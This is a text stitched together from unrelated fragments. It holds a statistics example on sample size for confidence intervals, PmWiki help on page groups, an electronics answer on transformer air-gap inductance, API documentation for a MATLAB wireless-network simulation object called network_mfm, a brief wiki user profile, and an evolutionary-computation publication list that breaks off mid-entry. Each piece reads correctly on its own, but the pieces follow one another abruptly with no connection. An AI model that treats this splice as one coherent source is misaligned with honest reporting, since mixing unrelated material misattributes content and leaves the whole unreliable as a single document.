${z}_{\frac{\alpha }{2}}$ , corresponding to the desired confidence level. A researcher planning a study who wants a specified confidence level and error bound can use this formula to calculate the size of the sample needed for the study. The population standard deviation for the age of Foothill College students is 15 years. If we want to be 95% confident that the sample mean age is within two years of the true population mean age of Foothill College students, how many randomly selected Foothill College students must be surveyed? • From the problem, we know that σ = 15 and EBM = 2. • z = z 0.025 = 1.96, because the confidence level is 95%. • n = $\frac{{z}^{2}{\sigma }^{2}}{EB{M}^{2}}$ = $\frac{{\left(1.96\right)}^{2}{\left(15\right)}^{2}}{{2}^{2}}$ = 216.09 using the sample size equation. • Use n = 217: Always round the answer UP to the next higher integer to ensure that the sample size is large enough.
Therefore, 217 Foothill College students should be surveyed in order to be 95% confident that we are within two years of the true population mean age of Foothill College students.
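As a quick check of the arithmetic in this example, a few lines of Python reproduce the sample-size calculation (using z = 1.96 for 95% confidence, σ = 15 and EBM = 2):

```python
# Sample size from the error bound formula n = z^2 * sigma^2 / EBM^2,
# rounded UP to the next integer.
import math

z = 1.96       # z_{alpha/2} for 95% confidence
sigma = 15.0   # population standard deviation (years)
ebm = 2.0      # desired error bound (years)

n_exact = (z ** 2 * sigma ** 2) / ebm ** 2
n_required = math.ceil(n_exact)
print(n_exact, n_required)   # 216.09, 217
```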
authors (basic) Pm Wiki has the capability of classifying pages into groups of related pages. By default page links are between pages of the same group; to create a link to a page in another group, add the name of the other group and a dot or slash to the page name. For example, links to Main.HomePage could be written as: *[[Main.HomePage]] *[[Main/HomePage]] *[[Main(.HomePage)]] *[[Main.HomePage | link text]] ## Creating groups Creating a new group is as easy as creating new pages; simply edit an existing page to include a link to a page in the new group, then click on the '?' to edit the page. By default, group names must start with a letter (but this can be changed by the wiki administrator). For example, to make a page called Bar in the group Foo, create a link to [[Foo/Bar]] and follow the link to edit that page. ## Groups in a standard Pm Wiki distribution • Main : The default group. On many wikis, it contains most of the author-contributed content. Main.Home Page and Main.Wiki Sandbox come pre-installed. • Pm Wiki : An edit-protected group that contains Pm Wiki documentation and help pages. • Site : Holds a variety of utility and configuration pages used by Pm Wiki, including SideBar, Search, Preferences, AllRecentChanges, ApprovedUrls, and Blocklist. To list all the groups in a site, try the markup (:pagelist fmt=group:). ## Special Pages in a Group By default, the Recent Changes page of each group shows only the pages that have changed within that group; the Site.AllRecentChanges page shows all pages that have changed in all groups. Each group can also have GroupHeader or GroupFooter pages that contain text to be automatically prepended or appended to every page in the group. A group can also have a GroupAttributes page that defines attributes (read and edit passwords) shared by all pages within the group. No, Pm Wiki does not have subpages. Pm's reasons for not having subgroups are described at PmWiki:HierarchicalGroups, but it comes down to not having a good page linking syntax. If you create a link or pagename like [[A.B.C]] Pm Wiki doesn't think of "B.C" as being in group "A", it instead thinks of "C" as being in group "AB", which is a separate group from "A". Wiki administrators can look at Cookbook:SubpageMarkup and Cookbook:IncludeWithEdit for recipes that may be of some help with developing subgroups or subpages.
# Electronic – How to correctly use the formula for calculating the air-gap in a pulse transformer resonant-converter transformer To achieve a certain value of the magnetizing inductance (Lm), we can adjust the transformer air gap. Air gap calculation formula: There is no particular information on this, but I assumed that: u0 = vacuum permeability (4π×10⁻⁷ H/m) N - primary turns? (x18) Ae effective area (PQ5050) = 328 mm² (core datasheet) Lm = magnetizing inductance (my goal - 60 uH) Substituting these values into the formula, I got a gap of 2.2 meters, which is clearly incorrect. (0.000001257 * 324(18^2) * 0.328) / 0.00006 Next, I tried replacing N with the transformation ratio (n = 1.5), and got a gap of 15.46 mm. This is closer to the truth, but still a very large gap. (0.000001257 * 2.25(1.5^2) * 0.328) / 0.00006 I also tried to remove the square from N, but this still gives a very large gap. Question: what is my mistake? I assumed that the problem is in N (it is not clear whether this is the number of turns of the primary winding, or the transformation ratio (but it is denoted by a small n)). Perhaps there are other formulas with which you can get the air gap value for the desired value of the magnetizing inductance? Well, you have the ferrite core-set data sheet and you have the ferrite material spec; 3C95, so let's proceed from there. The important formulas to know are these: - The effective permeability of a core set when gapped $$\mu_e = \dfrac{\mu_i}{\mu_i\cdot\dfrac{\ell_g}{\ell_e}+1}$$ • Where \(\mu_i\) is the ungapped magnetic relative permeability of 3C95 (2530) • Where \(\mu_e\) is the gapped magnetic relative permeability of 3C95 (trying to find this) • Where \(\ell_g\) is the length of the gap in metres (maybe 1 mm or 0.001 metres) • Where \(\ell_e\) is the core magnetic length in metres (0.113 metres) If you plug in the numbers with a gap of 1 mm, \(\mu_e\) equals 108.17 and this is used in the next formula for inductance: - Inductance of the gapped core set $$L = \dfrac{\mu_0\cdot\mu_e \cdot N^2 \cdot A_e}{\ell_e + \ell_g}$$ • Where \(A_e\) is the effective cross sectional area in m² (328 mm² or 3.28 × \(10^{-4}\) m²) • Where \(N\) is the number of turns (18) • Where \(\mu_0\) is \(4\pi\times 10^{-7}\) • The formula assumes that gapping has increased the magnetic length of the core - should you in fact "grind" down the centre limb, the total effective length remains as \(\ell_e\). So, if you plug in the numbers now (1 mm gap) you get 126.7 μH. Given the above, I reckon you should be able to figure out the reverse process to get the gap you need for the inductance you require (about 2 mm). Summary You will also have to double check that you have provided enough of a gap so that the peak magnetic flux density remains significantly less than 400 mT. I usually aim for 200 mT but, in the Cree document that you linked, they appear to be aiming for 120 mT. This is fairly easy to check remembering that \(B = \mu_0\cdot \mu_e\cdot H\) where \(H\) is the peak current multiplied by the number of turns and then divided by \(\ell_e\). Or, \(H = \dfrac{MMF}{\ell_e}\)
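Following the answer's suggestion to run the calculation in reverse, a short Python sketch (using the numbers quoted above: 3C95 with μi = 2530, Ae = 328 mm², ℓe = 113 mm, N = 18) sweeps the gap until the gapped inductance reaches the 60 µH target:

```python
# Solve for the air gap that gives the target magnetising inductance,
# using the two formulas from the answer above.
import math

MU0 = 4 * math.pi * 1e-7
MU_I = 2530          # ungapped relative permeability of 3C95
A_E = 328e-6         # effective area, m^2
L_E = 0.113          # effective magnetic path length, m
N_TURNS = 18
L_TARGET = 60e-6     # target magnetising inductance, H

def inductance(gap):
    mu_e = MU_I / (MU_I * gap / L_E + 1.0)
    return MU0 * mu_e * N_TURNS ** 2 * A_E / (L_E + gap)

# inductance decreases monotonically with gap, so a simple bisection works
lo, hi = 0.0, 10e-3
for _ in range(60):
    mid = 0.5 * (lo + hi)
    if inductance(mid) > L_TARGET:
        lo = mid
    else:
        hi = mid

gap = 0.5 * (lo + hi)
print(f"gap = {gap * 1e3:.2f} mm, L = {inductance(gap) * 1e6:.1f} uH")  # roughly 2.1 mm
```

This lands at roughly 2.1 mm, consistent with the "about 2 mm" quoted in the answer, and a 1 mm gap reproduces the 126.7 µH figure.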
An MFM network, as its name suggests, is used to house multiple devices and the links connecting them. MFM networks are represented by the network_mfm object. The network_mfm object simplifies adding devices to the network and provides multiple ways to establish links between the devices. While a network can be used in various fashions, the most straightforward is to populate it with source devices and destination devices. Source devices are device objects with transmit capability that will be transmitting to a destination device object having receive capability. When multiple source devices are present in the same network, interference manifests via links connecting source devices to devices other than their intended destinations. For example, there are four devices in the network shown in the figure above. The source device device-1 aims to transmit to the destination device device-2. The source device device-3 aims to transmit to the destination device device-4. Four link objects are produced: 1. two desired links shown in solid black—between device-1 and device-2 and between device-3 and device-4 2. two interference links shown in dashed red—between device-1 and device-4 and between device-3 and device-2 Using knowledge of these sources, destinations, and links, the network handles high-level operations like acquiring and distributing channel state information (CSI) and reporting performance metrics like mutual information/spectral efficiency and received symbol error. ### Creating a Network To create a network in MFM, use n = network_mfm.create() where n is an empty network_mfm object. ### Key Properties A network_mfm object n contains a few important properties. First, as mentioned, each network contains source-destination pairs—pairs of device objects—that indicate which devices (sources) are transmitting to which devices (destinations). The sources are stored in n.sources where n.sources is a cell of device objects having transmit capability. The number of sources in the network is n.num_sources Similarly, destination devices are stored in n.destinations which is a cell of device objects having receive capability. The number of destinations in the network—which should equal the number of sources—is stored in n.num_destinations The links in the network are stored in n.links which is a cell of link objects. The number of links in the network is stored in n.num_links All (unique) devices in the network are stored in n.devices which is a cell of device objects. In most cases, devices should be added to a network n using n.add_source_destination(source,destination) where source and destination are device objects. Note that pairs of devices are added to the network, not individual devices. This will automatically populate the properties n.sources and n.destinations with the newly added devices. This will also automatically include the source and destination devices in the property n.devices if they are not already present. ### Removing a Source-Destination Pair To remove a source-destination pair from a network n, simply use n.remove_source_destination_pair(source,destination) where source and destination are device objects to remove. Note that pairs of devices are removed from the network, not individual devices. To remove all source-destination pairs from a network n, use n.remove_all_source_destination() Recall that sources are transmitting devices and destinations are receiving devices.
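A minimal usage sketch of the calls introduced so far is given below. Here tx_1, rx_1, tx_2 and rx_2 are assumed to be device objects with transmit and receive capability respectively, created as described in the device documentation; only the network_mfm calls shown are taken from this page.

```matlab
% Minimal sketch: build a two-pair network with the calls documented above.
% tx_1, rx_1, tx_2, rx_2 are assumed to be existing device objects.
n = network_mfm.create();              % empty network
n.add_source_destination(tx_1,rx_1);   % first source-destination pair
n.add_source_destination(tx_2,rx_2);   % second source-destination pair
disp(n.num_sources);                   % 2
disp(n.num_destinations);              % 2
% pairs can also be removed again
% n.remove_source_destination_pair(tx_2,rx_2);
```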
### Establishing Links

The easiest and most practical way to establish links between devices in a network n is to use

n.populate_links_from_source_destination()

which will automatically establish links between all sources and destinations. In other words, for a given source, a link will be created between it and each destination in the network. With $N$ source-destination pairs, populating links between all sources and destinations will yield $N^2$ links.

While a physical link may exist between one source device and another source device, it does not hold much practical value since neither is necessarily receiving. Likewise, a physical link may exist between one destination device and another destination device, but it does not hold much practical value since neither is necessarily transmitting. Nonetheless, MFM supplies functions to manually create links via

n.add_link(lnk)

where lnk is a link object, or via

n.add_links(lnks)

where lnks is a vector of link objects.

### Viewing the Network

To view a network n in 3-D, use

n.show_3d()

which will display a 3-D figure of the devices and links in the network.

### Passthrough Methods

Configuring each link and each device in a network can be quite cumbersome, especially as the network grows. To make configuring objects network-wide more straightforward, we have provided the following passthrough methods for network_mfm objects.

#### Channel and Path Loss Models

Links within a network n can be configured one-by-one if desired by accessing the i-th link directly via n.links{i}. It is often the case, however, that the same channel model and path loss model will be used across all links in a network. In light of this, MFM supplies the functions

n.set_channel(c)
n.set_path_loss(p)

where c is a channel object and p is a path_loss object. This will set each link object in the network to use the same channel model and path loss model, each with their own unique realizations.

#### Carrier Frequency, Propagation Velocity, and Symbol Bandwidth

To set the carrier frequency, propagation velocity, and symbol bandwidth at all devices and links within a network n, use

n.set_carrier_frequency(fc);
n.set_propagation_velocity(vel);
n.set_symbol_bandwidth(B);

where fc is the carrier frequency (in Hz), vel is the propagation velocity (in m/s), and B is the symbol bandwidth (in Hz).

#### Transmit Power

To set the transmit power at all devices to a value of P, use

n.set_transmit_power(P,unit)

where unit is a string specifying the units of P (e.g., 'dBm', 'watts').

#### Noise Power

To set the noise power at all devices to a value of noise_psd, use

n.set_noise_power_per_Hz(noise_psd,unit)

where unit is a string specifying the units of noise_psd (e.g., 'dBm_Hz', 'watts_Hz').

#### Number of Streams

To set the number of streams at all devices to a value of Ns, use

n.set_num_streams(Ns)

#### Transmit Symbol

To set the transmit symbol at all devices to a vector s, use

n.set_transmit_symbol(s)

Note that this is only appropriate if all devices are transmitting with the same number of streams.
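Pulling these passthrough methods together, a network-wide configuration might look like the sketch below. The channel and path-loss objects, as well as the numeric values, are placeholders chosen for illustration; only the network_mfm calls themselves come from the documentation above.

```matlab
% Sketch: network-wide configuration via passthrough methods.
% c and p are placeholders -- create them per the channel/path_loss documentation.
n.populate_links_from_source_destination();   % desired + interference links

n.set_channel(c);                              % same channel model on every link
n.set_path_loss(p);                            % same path loss model on every link

n.set_carrier_frequency(28e9);                 % example: 28 GHz carrier
n.set_propagation_velocity(3e8);               % speed of light (m/s)
n.set_symbol_bandwidth(100e6);                 % example: 100 MHz symbol bandwidth

n.set_transmit_power(20,'dBm');                % example transmit power at all devices
n.set_noise_power_per_Hz(-174,'dBm_Hz');       % thermal noise PSD at all devices
n.set_num_streams(1);                          % single data stream per link
```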
### Invoking a Network Realization

To invoke a realization of the channels on all links in a network n, use

n.realization_channel()

To invoke a realization of the path loss on all links in a network n, use

n.realization_path_loss()

To invoke a realization of all channels and path losses in one line, simply use

n.realization()

### Channel State Information

To compute the channel state information for a realization of a network n, use

n.compute_channel_state_information()

To supply each device with this computed channel state information, use

n.supply_channel_state_information()

### Configuring Devices to Transmit and Receive

To configure all transmitters in the network to use a particular transmit strategy, use

n.configure_transmitter(strategy)

where strategy is a string specifying which strategy the transmitters should use. This string must be one of the valid transmit strategies that have been defined for the transmitter objects being used in the network. Please refer to the documentation on the transmitter object for more information.

To configure all receivers in the network to use a particular receive strategy, use

n.configure_receiver(strategy)

where strategy is a string specifying which strategy the receivers should use. This string must be one of the valid receive strategies that have been defined for the receiver objects being used in the network. Please refer to the documentation on the receiver object for more information.

### Received Signals at Each Device

With a realized network and configured transmitters and receivers, the received signals at each device can be computed via

n.compute_received_signals()

### Performance Metrics

To evaluate the performance of a network, MFM can compute and report the mutual information and the estimation error of the receive symbol versus the transmit symbol for each source-destination pair.

#### Mutual Information

To report the achieved Gaussian mutual information (spectral efficiency) between a source device and a destination device, use

mi = n.report_mutual_information(source,destination)

where source is a source device, destination is a destination device, and mi is the mutual information in bps/Hz.

#### Symbol Estimation Error

To report the achieved estimation error between the transmit symbol $\mathbf{s}$ at a source device and the receive symbol $\hat{\mathbf{s}}$ at a destination device, use

[err,nerr] = n.report_symbol_estimation_error(source,destination)

where source is a source device, destination is a destination device, err is the symbol estimation error, defined as

$\mathrm{err} = \| \hat{\mathbf{s}} - \mathbf{s} \|^2$

and nerr is the symbol estimation error normalized to the transmit symbol energy, defined as

$\mathrm{nerr} = \dfrac{\| \hat{\mathbf{s}} - \mathbf{s} \|^2}{\| \mathbf{s} \|^2}$
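With the network configured as in the previous sketches, a single simulation pass chains these calls together. The strategy strings below are placeholders; substitute strategies that are actually defined for the transmitter and receiver objects in use.

```matlab
% Sketch: one end-to-end simulation pass over a configured network n.
n.realization();                          % realize all channels and path losses

n.compute_channel_state_information();    % compute CSI for this realization
n.supply_channel_state_information();     % distribute the CSI to each device

n.configure_transmitter('transmit-strategy-name');   % placeholder strategy string
n.configure_receiver('receive-strategy-name');       % placeholder strategy string

n.compute_received_signals();             % received signal at each destination

% Report performance for the (tx,rx) pair registered earlier
mi = n.report_mutual_information(tx,rx);              % bps/Hz
[err,nerr] = n.report_symbol_estimation_error(tx,rx); % squared error, normalized error
```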
### List of Properties

The network_mfm object contains the following properties:

* network_mfm.name
* network_mfm.devices
* network_mfm.num_devices
* network_mfm.links
* network_mfm.num_links
* network_mfm.sources
* network_mfm.num_sources
* network_mfm.destinations
* network_mfm.num_destinations
* network_mfm.propagation_velocity
* network_mfm.carrier_frequency
* network_mfm.carrier_wavelength
* network_mfm.symbol_bandwidth
* network_mfm.channel_state_information_transmit
* network_mfm.channel_state_information_receive

### List of Methods

The network_mfm object contains the following methods.

#### add_destination(destination)

Adds a destination device to the network.

Usage: add_destination(destination)

Input Arguments: destination — a device object

#### add_device(device)

Adds a device to the network.

Usage: add_device(device)

Input Arguments: device — a device object

#### add_devices(devices)

Adds a vector of devices to the network.

Usage: add_devices(devices)

Input Arguments: devices — a vector (or cell) of device objects

#### add_link(lnk)

Adds a link to the network.

Usage: add_link(lnk)

Input Arguments: lnk — a link object

#### add_links(links)

Adds a vector of links to the network.

Usage: add_links(links)

Input Arguments: links — a vector of link objects

#### add_source(source)

Adds a source device to the network.

Usage: add_source(source)

Input Arguments: source — a device object

#### add_source_destination(source,destination)

Adds a source-destination pair to the network.

Usage: add_source_destination(source,destination)

Input Arguments:
source — a device object to be the source
destination — a device object to be the destination

#### compute_channel_state_information()

Computes the channel state information for each device in the network. For each device, the CSI is collected across all links in which the device is the transmitter (head on the forward link, tail on the reverse link) or receiver (tail on the forward link, head on the reverse link).

Usage: compute_channel_state_information()

#### compute_channel_state_information_receive(dev)

Computes the receive channel state information for a device. Specifically, it collects the CSI across all links (forward and reverse) in which the device could be a receiver. This reduces to collecting CSI across forward links where the device is the tail and across reverse links where the device is the head.

Usage: csi = compute_channel_state_information_receive(dev)

Input Arguments: dev — a device object

Return Values: csi — a struct of channel state information values

#### compute_channel_state_information_transmit(dev)

Computes the transmit channel state information for a device. Specifically, it collects the CSI across all links (forward and reverse) in which the device could be a transmitter. This reduces to collecting CSI across forward links where the device is the head and across reverse links where the device is the tail.

Usage: csi = compute_channel_state_information_transmit(dev)

Input Arguments: dev — a device object

Return Values: csi — a struct of channel state information values

#### compute_covariance_desired(source,destination)

Computes the covariance of the received symbols at a destination device from its source. Also returns the covariance of the received noise.

Usage: [Ry,Rn] = compute_covariance_desired(source,destination)

Input Arguments:
source — a source device
destination — a destination device

Return Values:
Ry — the desired signal covariance
Rn — the noise covariance

#### compute_covariance_interference(source,destination)

Computes the covariance of received interference at a destination device (i.e., the contribution of all interference links).

Usage: R = compute_covariance_interference(source,destination)

Input Arguments:
source — a source device
destination — a destination device

Return Values: R — the covariance matrix of interference

Notes: Assumes independence across interferers.

#### compute_received_signal(destination)

Computes the signal impinging on the receive array at a destination device. This comprises all desired and interfering transmitters as well as additive noise.
Usage: y = compute_received_signal(destination)

Input Arguments: destination — a device object

Return Values: y — the vector impinging on the receive array at the destination

#### compute_received_signals()

Computes the received signal at each destination device in the network.

Usage: compute_received_signals()

#### configure_receiver(strategy)

Configures each destination in the network according to its existing/specified receive strategy.

Usage:
configure_receiver()
configure_receiver(strategy)

Input Arguments: strategy — (optional) a string specifying the receive strategy to use, overwriting existing ones

#### configure_transmitter(strategy)

Configures each source in the network according to its existing/specified transmit strategy.

Usage:
configure_transmitter()
configure_transmitter(strategy)

Input Arguments: strategy — (optional) a string specifying the transmit strategy to use, overwriting existing ones

#### create()

Creates a network object.

Usage: obj = network_mfm.create()

Return Values: obj — an MFM network object

#### get_device_index(dev)

Returns the index of a device within the devices in the network.

Usage: idx = get_device_index(dev)

Input Arguments: dev — a device object or index of a device

Return Values: idx — the index of the device

#### get_link_index(lnk)

Returns the index of a link within the links in the network.

Usage: idx = get_link_index(lnk)

Input Arguments: lnk — a link object or index of a link

Return Values: idx — the index of the link

#### get_link_index_destination(destination)

Returns the indices of the links in the network that contain a destination device. Also returns whether each of those links is forward or reverse.

Usage: [idx,fwd_rev] = get_link_index_destination(destination)

Input Arguments: destination — a destination device

Return Values:
idx — a vector of indices of links in the network
fwd_rev — a vector of booleans indicating if the forward or reverse link contains the destination device as the receiving side (0 for forward, 1 for reverse)

#### get_link_index_source_destination(source,destination)

Returns the index of the link with a specific source-destination pair and an indicator of whether that link is a forward or reverse link.

Usage: [idx,fwd_rev] = get_link_index_source_destination(source,destination)

Input Arguments:
source — a device object
destination — a device object

Return Values:
idx — the index of the link whose head and tail are the source and destination (or vice versa); returns 0 if not found
fwd_rev — a boolean indicating if the head or tail of the link is the source (0 if head = source, forward; 1 if tail = source, reverse)

#### get_link_index_source_destination_forward(source,destination)

Returns the index of the link whose head and tail are specific source and destination devices, respectively (i.e., which link has head = source and tail = destination).

Usage: idx = get_link_index_source_destination_forward(source,destination)

Input Arguments:
source — a device object
destination — a device object

Return Values: idx — the index of the link whose head and tail are the source and destination, respectively; returns 0 if not found

#### get_link_index_source_destination_reverse(source,destination)

Returns the index of the link whose tail and head are specific source and destination devices, respectively (i.e., which link has head = destination and tail = source).

Usage: idx = get_link_index_source_destination_reverse(source,destination)

Input Arguments:
source — a device object
destination — a device object

Return Values: idx — the index of the link whose tail and head are the source and destination, respectively; returns 0 if not found
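The lookup helpers above can be combined with the network's links cell to retrieve a particular link object. A brief sketch, reusing the tx and rx devices from the earlier sketches:

```matlab
% Sketch: retrieve the link object connecting a given source-destination pair,
% using the lookup helpers documented above.
[idx,fwd_rev] = n.get_link_index_source_destination(tx,rx);
if idx == 0
    warning('No link found between the requested source and destination.');
else
    lnk = n.links{idx};            % links are stored as a cell of link objects
    if fwd_rev == 0
        disp('Source is the head of the link (forward link).');
    else
        disp('Source is the tail of the link (reverse link).');
    end
end
```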
#### initialize()

Executes initialization steps to set up a network.

Usage: initialize()

#### network_mfm(name)

Creates a network object.

Usage:
obj = network_mfm()
obj = network_mfm(name)

Input Arguments: name — an optional name for the network

Return Values: obj — an object representing a network

#### populate_devices_from_links()

Populates the devices in the network from the links in the network.

Usage: populate_devices_from_links()

#### populate_links_from_devices()

Populates the links in the network from the devices in the network by linking each pair of devices.

Usage: populate_links_from_devices()

#### populate_links_from_source_destination()

Populates the links in the network from the sources and destinations in the network by linking each pair of devices. Removes all links before populating links.

Usage: populate_links_from_source_destination()

#### realization()

Invokes a realization of the network, including all of the links it contains.

Usage: realization()

#### remove_all_devices()

Removes all devices from the network.

Usage: remove_all_devices()

#### remove_all_links()

Removes all links from the network.

Usage: remove_all_links()

#### remove_all_links_with_device(dev)

Removes all links having a particular device as its head or tail.

Usage: remove_all_links_with_device(dev)

Input Arguments: dev — a device object

#### remove_all_source_destination()

Removes all source-destination pairs from the network.

Usage: remove_all_source_destination()

#### remove_all_source_destination_with_device(dev)

Removes all source-destination pairs having a particular device as the source or destination.

Usage: remove_all_source_destination_with_device(dev)

Input Arguments: dev — a device object

#### remove_device(idx)

Removes a device from the network.

Usage:
remove_device()
remove_device(idx)

Input Arguments: idx — (optional) device index to remove from the network (default is the last device in the network)

#### remove_link(lnk)

Removes a link from the network.

Usage:
remove_link()
remove_link(lnk)

Input Arguments: lnk — (optional) link index or object to remove from the network; if not passed, the last link in the network is removed

#### remove_source_destination(source,destination)

Removes a source-destination pair from the network.

Usage: remove_source_destination(source,destination)

Input Arguments:
source — a device object
destination — a device object

#### report_mutual_information(source,destination)

Reports the Gaussian mutual information achieved between a source-destination pair based on the current network realization and transmit-receive configurations. Returns the mutual information in bps/Hz. Discards any residual imaginary component.

Usage: mi = report_mutual_information(source,destination)

Input Arguments:
source — a source device
destination — a destination device

Return Values: mi — the mutual information in bps/Hz

Notes: Will warn the user if a significant imaginary portion exists when computing the mutual information, but ultimately discards it.

#### report_symbol_estimation_error(source,destination)

Returns the squared error in the estimated receive symbol at the destination compared to the transmit symbol at the source.
Usage: [err,nerr] = report_symbol_estimation_error(source,destination)

Return Values:
err — the squared error of the received symbols versus the transmitted symbols
nerr — err normalized to the transmit symbol power

#### set_arrays(transmit_array,receive_array)

Usage: set_arrays(transmit_array,receive_array)

Input Arguments:
transmit_array — an array object
receive_array — an array object

#### set_carrier_frequency(fc)

Sets the carrier frequency on each link.

Usage: set_carrier_frequency(fc)

Input Arguments: fc — carrier frequency in Hertz

#### set_channel(channel_object)

Sets the channel model used on each link.

Usage: set_channel(channel_object)

Input Arguments: channel_object — a channel object

#### set_name(name)

Sets the name of the network.

Usage:
set_name()
set_name(name)

Input Arguments: name — (optional) a string; if not passed, a name is created

#### set_noise_power_per_Hz(noise_psd,unit)

Sets the noise power spectral density on each link.

Usage:
set_noise_power_per_Hz(noise_psd)
set_noise_power_per_Hz(noise_psd,unit)

Input Arguments:
noise_psd — noise power spectral density
unit — (optional) a string specifying the unit of noise_psd; if not passed, the default will be used

#### set_num_rf_chains(Lt,Lr)

Usage:
set_num_rf_chains(Lt)
set_num_rf_chains(Lt,Lr)

Input Arguments:
Lt — number of transmit RF chains
Lr — (optional) number of receive RF chains; if not passed, the number of transmit RF chains is used

#### set_num_streams(num_streams)

Sets the number of streams on each link.

Usage: set_num_streams(num_streams)

Input Arguments: num_streams — number of data streams

#### set_path_loss(path_loss_object)

Sets the path loss model used on each link.

Usage: set_path_loss(path_loss_object)

Input Arguments: path_loss_object — a path loss object

#### set_propagation_velocity(velocity)

Sets the propagation velocity on each link.

Usage: set_propagation_velocity(velocity)

Input Arguments: velocity — propagation velocity in meters per second

#### set_snr(snr_forward,snr_reverse,unit)

Sets the large-scale SNR on each of the links.

Usage:
set_snr(snr_forward)
set_snr(snr_forward,[],unit)
set_snr(snr_forward,snr_reverse,unit)

Input Arguments:
snr_forward — the SNR to use on the forward links
snr_reverse — (optional) the SNR to use on the reverse links; if not passed, snr_forward is used
unit — (optional) a string specifying the units of snr_forward and snr_reverse (e.g., 'dB' or 'linear')

#### set_symbol_bandwidth(B)

Sets the symbol bandwidth on each link.

Usage: set_symbol_bandwidth(B)

Input Arguments: B — symbol bandwidth in Hertz

#### set_transmit_power(P,unit)

Sets the transmit power used on each link.

Usage:
set_transmit_power(P)
set_transmit_power(P,unit)

Input Arguments:
P — transmit power
unit — (optional) a string specifying the unit of P (e.g., 'dBm', 'watts'); if not passed, the default is used

#### set_transmit_symbol(s)

Sets the transmit symbol used on each link.

Usage: set_transmit_symbol(s)

Input Arguments: s — a symbol vector

#### set_transmit_symbol_covariance(Rs)

Sets the transmit covariance on each link.

Usage: set_transmit_symbol_covariance(Rs)

Input Arguments: Rs — a covariance matrix

#### show_2d(fignum)

Displays the network in 2-D.
Usage:
show_2d()
show_2d(fignum)

Input Arguments: fignum — (optional) a figure number; if not passed, a new figure will be created

Return Values: fig — the resulting figure handle

#### show_3d(fignum)

Displays the network in 3-D.

Usage:
show_3d()
show_3d(fignum)

Input Arguments: fignum — (optional) a figure number; if not passed, a new figure will be created

Return Values: fig — the resulting figure handle

#### supply_channel_state_information()

Supplies channel state information to each of the sources and destinations in the network.

Usage: supply_channel_state_information()
# Siko1056

Joined 14 April 2013

## Who am I

My name is Kai Torben Ohlhus. During GSoC 2013 I started working on incomplete factorizations for Octave (read my blog) and have made some minor contributions so far. My area of interest is computer arithmetic and reliable computing techniques. My nickname is siko1056 on IRC and the like.
Proceedings of the Genetic and Evolutionary Computation Conference, 2007 Epsilon-constraint with an efficient cultured differential evolution. Proceedings of the Genetic and Evolutionary Computation Conference, 2007 Use of Radial Basis Functions and Rough Sets for Evolutionary Multi-Objective Optimization. Proceedings of the IEEE Symposium on Computational Intelligence in Multicriteria Decision Making, 2007 An ant system with steps counter for the job shop scheduling problem. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 Applications of multi-objective evolutionary algorithms in economics and finance: A survey. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 A boundary search based ACO algorithm coupled with stochastic ranking. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 A bi-population PSO with a shake-mechanism for solving constrained numerical optimization. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 Constraint handling techniques for a non-parametric real-valued estimation distribution algorithm. Proceedings of the IEEE Congress on Evolutionary Computation, 2007 Evolutionary algorithms for solving multi-objective problems, Second Edition. Genetic and evolutionary computation series, Springer, ISBN: 978-0-387-33254-3, 2007 2006 Asymptotic convergence of metaheuristics for multiobjective optimization problems. Soft Comput., 2006 Asymptotic convergence of a simulated annealing algorithm for multiobjective optimization problems. Math. Methods Oper. Res., 2006 A New Proposal for Multiobjecive Optimization Using Particle Swarm Optimization and Rough Sets Theory. Proceedings of the Parallel Problem Solving from Nature, 2006 A Particle Swarm Optimizer for Constrained Numerical Optimization. Proceedings of the Parallel Problem Solving from Nature, 2006 Solving Hard Multiobjective Optimization Problems Using <i>epsilon</i>-Constraint with Cultured Differential Evolution. Proceedings of the Parallel Problem Solving from Nature, 2006 A Multi-objective Particle Swarm Optimizer Hybridized with Scatter Search. Proceedings of the MICAI 2006: Advances in Artificial Intelligence, 2006 Dynamic fitness inheritance proportion for multi-objective particle swarm optimization. Proceedings of the Genetic and Evolutionary Computation Conference, 2006 A comparative study of differential evolution variants for global optimization. Proceedings of the Genetic and Evolutionary Computation Conference, 2006 A new proposal for multi-objective optimization using differential evolution and rough sets theory. Proceedings of the Genetic and Evolutionary Computation Conference, 2006 EMOPSO: A Multi-Objective Particle Swarm Optimizer with Emphasis on Efficiency. Proceedings of the Evolutionary Multi-Criterion Optimization, 4th International Conference, 2006 Modified Differential Evolution for Constrained Optimization. Proceedings of the IEEE International Conference on Evolutionary Computation, 2006 Boundary Search for Constrained Numerical Optimization Problems in ACO Algorithms. Proceedings of the Ant Colony Optimization and Swarm Intelligence, 2006 2005 A simple multimembered evolution strategy to solve constrained optimization problems. IEEE Trans. Evol. Comput., 2005 Extraction and reuse of design patterns from genetic algorithms using case-based reasoning. Soft Comput., 2005 Solving Multiobjective Optimization Problems Using an Artificial Immune System. Genet. Program. 
Evolvable Mach., 2005 A proposal to use stripes to maintain diversity in a multi-objective particle swarm optimizer. Proceedings of the 2005 IEEE Swarm Intelligence Symposium, 2005 Fitness inheritance in multi-objective particle swarm optimization. Proceedings of the 2005 IEEE Swarm Intelligence Symposium, 2005 Coevolutionary Multi-objective Optimization Using Clustering Techniques. Proceedings of the MICAI 2005: Advances in Artificial Intelligence, 2005 Useful Infeasible Solutions in Engineering Optimization with Evolutionary Algorithms. Proceedings of the MICAI 2005: Advances in Artificial Intelligence, 2005 An Introduction to Evolutionary Algorithms and Their Applications. Proceedings of the Advanced Distributed Systems: 5th International School and Symposium, 2005 Handling Constraints in Global Optimization Using an Artificial Immune System. Proceedings of the Artificial Immune Systems: 4th International Conference, 2005 Evolutionary Multi-Objective Optimization: Current State and Future Challenges. Proceedings of the 5th International Conference on Hybrid Intelligent Systems (HIS 2005), 2005 Promising infeasibility and multiple offspring incorporated to differential evolution for constrained optimization. Proceedings of the Genetic and Evolutionary Computation Conference, 2005 Use of domain information to improve the performance of an evolutionary algorithm. Proceedings of the Genetic and Evolutionary Computation Conference, 2005 Optimization with constraints using a cultured differential evolution approach. Proceedings of the Genetic and Evolutionary Computation Conference, 2005 Asymptotic Convergence of Some Metaheuristics Used for Multiobjective Optimization. Proceedings of the Foundations of Genetic Algorithms, 8th International Workshop, 2005 Saving Evaluations in Differential Evolution for Constrained Optimization. Proceedings of the Sixth Mexican International Conference on Computer Science (ENC 2005), 2005 Improving PSO-Based Multi-objective Optimization Using Crowding, Mutation and epsilon-Dominance. Proceedings of the Evolutionary Multi-Criterion Optimization, 2005 Current Status of the EMOO Repository, Including 